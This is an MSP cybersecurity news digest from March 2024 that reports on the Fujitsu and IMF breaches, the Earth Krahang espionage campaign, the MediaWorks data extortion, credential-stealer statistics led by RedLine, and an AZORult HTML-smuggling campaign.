MSP cybersecurity news digest, March 28, 2024

Fujitsu, the world's sixth-largest IT services provider, with 124,000 employees and an annual revenue of USD 23.9 billion, detected malware on several of its systems, potentially resulting in the theft of customer data. Operating in over 100 countries, Fujitsu maintains a significant presence in the global market and collaborates extensively with the Japanese government on various projects, including national security initiatives and R&D projects.

Fujitsu disclosed a cybersecurity incident involving compromised systems and customer data, prompting immediate actions to isolate affected computers and enhance monitoring measures.

While investigations continue into the origin and extent of the breach, Fujitsu has notified regulatory authorities and is preparing individual notifications for affected customers.

Notably, this incident follows a similar attack in May 2021, where Fujitsu's ProjectWEB tool was exploited, compromising government agencies and exposing sensitive data, leading to subsequent security enhancements and tool replacements.

The International Monetary Fund (IMF) reported a cyber incident wherein 11 IMF email accounts were breached by unidentified attackers, as disclosed in a press release. Headquartered in Washington, D.C., the IMF, funded by 190 member countries, is a prominent United Nations financial agency.

Initial findings suggest that the attackers did not infiltrate any other systems beyond the compromised email accounts. The IMF stated that the affected accounts have been secured again, and the investigation is ongoing with the assistance of cybersecurity experts. Although specific details about the breach were not provided, the IMF confirmed its use of the Microsoft 365 email platform, clarifying that this incident does not seem to be a result of Microsoft being targeted.

The IMF has experienced similar incidents in the past, such as a significant breach in 2011, necessitating precautionary measures like severing network connections with the World Bank.

An advanced hacking campaign conducted by the Chinese Advanced Persistent Threat (APT) group 'Earth Krahang' has breached 70 organizations out of 116 targeted across 45 countries, as reported by researchers.

This campaign, ongoing since early 2022, primarily focuses on government entities, compromising 48 government organizations, including 10 foreign affairs ministries, and targeting an additional 49 government agencies. Using vulnerable internet-facing servers and spear-phishing emails, the attackers deploy custom backdoors to engage in cyberespionage activities.

Earth Krahang leverages breached government infrastructure to attack other governments, establishes VPN servers on compromised systems, and employs brute-forcing techniques to crack passwords for valuable email accounts. Employing open-source tools, the threat actors exploit specific vulnerabilities to gain unauthorized access, deploy web shells for persistence, and utilize spear-phishing tactics to initiate attacks, often themed around geopolitical subjects.

Additionally, Earth Krahang retrieves email addresses from targets during reconnaissance, deploying malicious attachments to spread infections and ensuring redundancy in case of detection. The threat group employs various tools and malware, including Cobalt Strike, RESHELL, and XDealer, enhancing their capabilities for command execution and data collection within victim networks.

MediaWorks, a prominent media company, confirmed a recent cyberattack after a threat on a dark web forum emerged regarding data from website competition entries. The company responded by transferring all competition entries to a new secure database amid concerns about data breaches affecting these entries.

MediaWorks reiterated its commitment to data security, stating that its technology team and external experts were actively investigating the cyberattack. MediaWorks pledged to share more information as the investigation progressed. OneERA, the threat actor responsible for the cyberattack, claimed unauthorized access to over 2.4 million records allegedly containing personally identifiable information of individuals in New Zealand.

The aftermath of the cyberattack saw attackers resorting to blackmail tactics by reaching to individual victims and demanding a ransom of US 500 in Bitcoin to prevent the public release of compromised data. MediaWorks acknowledged the situation and encouraged affected individuals to contact its privacy office for assistance, while ongoing monitoring of the situation by The Cyber Express awaits further updates from MediaWorks.

Researchers have discovered that RedLine malware has been utilized to steal more than 170 million passwords in the past six months, making it the most notorious credential stealer during that period.

RedLine accounted for 47% of all cyber incidents involving stolen passwords, surpassing Vidar, the next closest stealer, by over two-fold. Vidar pilfered more than 65 million passwords (17%). Raccoon Stealer, ranked third, was linked to over 42 million stolen passwords (11.7%). Malware strains Meta, Cryptbot, Risepro, StealC, AZORult, Aurora and Darkcrystal rounded out the top 10 credential stealers. The data was sourced from known breached password lists analyzing 359 million stolen passwords over the last six months.

In separate research, cybersecurity experts have uncovered a new malware campaign that utilizes fraudulent Google Sites pages and HTML smuggling to disseminate AZORult, a commercial malware designed for information theft. The campaign employs an unusual HTML smuggling technique where the malicious payload is embedded in a separate JSON file hosted on an external website. Although the phishing campaign has not been attributed to a specific threat actor or group, it is described as widespread and aims to gather sensitive data for sale on underground forums.